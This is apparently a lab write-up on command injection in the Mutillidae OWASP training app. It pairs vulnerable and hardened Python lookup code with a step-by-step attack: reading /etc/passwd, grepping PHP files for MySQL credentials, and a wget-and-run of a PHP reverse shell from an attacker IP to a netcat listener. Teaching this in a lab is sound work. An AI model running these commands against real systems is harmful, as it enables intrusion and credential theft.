In this post, we covered the command injection vulnerability and performed a practical demonstration using the Mutillidae OWASP lab.
Command injection is a widespread and dangerous vulnerability class that lets an attacker remotely execute operating-system commands on the server, with consequences ranging from data leakage to full denial of service.
What’s Command Injection?
So, what is command injection? It is a vulnerability that arises when a web application builds an operating-system command out of user input without validating or escaping that input first. Think about a DNS lookup form or a ping tool on a website: the application takes the hostname you type and hands it to the shell. If an attacker can slip shell metacharacters such as ";", "|", "&&" or "$(...)" into that input along with a command of their own, the shell parses the whole string and runs the attacker's command too. It is like telling the server to do one thing, but secretly making it do something else entirely, with the privileges of the web server process.
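To make the mechanism concrete, here is an added example (my own code, not Mutillidae's) that places the vulnerable pattern beside a hardened one. The lookup functions, the hostname check and the sample inputs are assumptions for illustration; `echo` stands in for `nslookup` so the code runs offline. In PHP the vulnerable pattern is the classic `shell_exec("nslookup " . $target)`.

```python
import re
import subprocess

# Constructed sample inputs (not from the original post): a benign hostname
# and an attacker-controlled value that appends a second command after ";".
BENIGN = "www.example.com"
PAYLOAD = "www.example.com; echo INJECTED"

# Allowlist for hostnames: labels of letters, digits and hyphens (no leading
# or trailing hyphen) joined by dots. Shell metacharacters, spaces and a
# leading "-" (which a real tool could read as an option) cannot match.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"(?:[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.)*"
    r"[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?$"
)


def is_valid_hostname(value: str) -> bool:
    """Return True only for syntactically valid DNS names."""
    return bool(_HOSTNAME_RE.match(value))


def lookup_vulnerable(target: str) -> str:
    """The mistake behind command injection: user input is concatenated into a
    command line and handed to /bin/sh, so the shell interprets any ';', '|',
    '&&' or '$(...)' the attacker included. ('echo' plays the role of nslookup.)
    """
    completed = subprocess.run(
        "echo lookup " + target, shell=True, capture_output=True, text=True
    )
    return completed.stdout


def lookup_no_shell(target: str) -> str:
    """First fix: pass an argv list and never involve a shell. The whole
    input becomes a single argument, so ';' is just a character in a string.
    """
    completed = subprocess.run(
        ["echo", "lookup", target], shell=False, capture_output=True, text=True
    )
    return completed.stdout


def lookup_hardened(target: str) -> str:
    """Second fix, on top of the first: reject anything that is not a
    hostname before it reaches the program. This also blocks option injection
    (values starting with '-'), which the argv list alone does not prevent.
    """
    if not is_valid_hostname(target):
        raise ValueError("invalid hostname: %r" % target)
    return lookup_no_shell(target)


def hardened_rejects(target: str) -> bool:
    """Helper for checking the validation path: True if the input is refused."""
    try:
        lookup_hardened(target)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Vulnerable: both commands run, the injected one shows up in the output.
    print(lookup_vulnerable(PAYLOAD), end="")
    # No shell: the payload is printed back as inert data.
    print(lookup_no_shell(PAYLOAD), end="")
    # Hardened: the payload never reaches the program at all.
    print("rejected:", hardened_rejects(PAYLOAD))
```

The second output line is the one to look at: with `shell=False` the attacker's `; echo INJECTED` is merely part of a (nonsensical) hostname string, which is why "don't build command lines from strings" is the primary fix and input validation is the defense-in-depth layer.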
My Step-by-Step Attack
In my demonstration, I used a DNS lookup tool in the lab to show how this works. Here’s how I went from a simple lookup to owning the whole system:
- Finding My Bearings: I started by appending basic commands to the DNS lookup input. I used `pwd` to see which directory the web server was running in, and `cat /etc/passwd` to see whether I could read the system's account file (it lists user accounts rather than password hashes, but reading it proves arbitrary file access). Both worked, which confirmed the vulnerability.
- Digging for Gold (MySQL Credentials): My next goal was the database credentials. I used `find` to search for PHP files containing the words "password" or "user", hoping to turn up a configuration file. This led me straight to the MySQL username ("root") and password ("very level of application").
- The Grand Finale: Getting a Shell: This is the ultimate goal for any attacker. I wanted a full, interactive shell on the server.
  - First, I set up a Netcat listener on my own machine. This is like opening a door and waiting for a connection to come through.
  - Next, I used the command injection vulnerability to make the server download a PHP reverse shell from my machine and run it.
  - As soon as the server ran the script, it connected back to my listener, and just like that, I had a shell. I could now run commands like `whoami` and `ls` as if I were logged in directly on the server.
Owning the System
With a shell on the machine, it was game over. I demonstrated how I could navigate the file system, read files, and run whatever the web server's account was allowed to run. Note that the shell inherits the privileges of the web server process, so "anything" means anything that account can do; taking full control of the host from there would be a separate privilege-escalation step. Even so, this shows how a seemingly small flaw, one unescaped input field, leads directly to remote code execution and credential theft.
Technical Commands I Used
Here is the list of commands I used during the attack, grouped by where each one was typed:

```shell
# Injected through the vulnerable DNS lookup field on the target
pwd
cat /etc/passwd
find . -name "*.php" -exec grep -i "password" {} \;
find . -name "*.php" -exec grep -i "user\|login" {} \;
cat /var/www/html/mutillidae/config.inc

# On the attacker machine: listen for the reverse shell
nc -lvp 4444

# Injected on the target: fetch the PHP reverse shell from the attacker machine and run it
wget http://192.168.1.104/shell.php -O /tmp/shell.php && php /tmp/shell.php

# Inside the reverse shell once it connects back
id
ls
cd ..
cd /
```
Video Demonstration